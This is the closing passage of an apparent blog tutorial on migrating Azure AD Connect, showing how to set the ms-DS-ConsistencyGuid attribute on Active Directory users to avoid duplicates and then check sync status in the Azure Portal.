<p>Right Click on the User, go to Properties &gt; Attribute Editor, and find the "ms-DS-ConsistencyGuid" attribute.</p>
<p>Select Edit/Modify for the attribute.</p>
<p>Paste the 32-character hex string from before.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/cc737de5a00d7a3c22f6266183acf43526bbdabdc99fcdf4c49696fdd8ff725f.webp" alt /></p>
<p>Apply and OK.</p>
<p>You will have to do this for all the users; otherwise, they will be duplicated.</p>
<p>Now, you can install Azure AD Connect and start the sync process again.</p>
<h1 id="heading-the-result"><em>The result</em></h1>
<p>The installation will create a synchronization service account.</p>
<p>If the ms-DS-ConsistencyGuid values were set correctly, the existing user accounts will not be duplicated.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/5f21322bc64f6d4a38caabb30dd482799ee41a7ab87596e6adb14d840156a78c.webp" alt /></p>
<p>On the Azure Portal, check that Sync Status is Enabled and Last Synced is recent.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/b7c33b44257994c9f8d399d38b0d4bd58ff764d4e7922e91da3a00382c94af65.webp" alt /></p>
<p>After this, you have successfully migrated your existing Azure AD Connect!</p>
]]></content:encoded></item></channel></rss>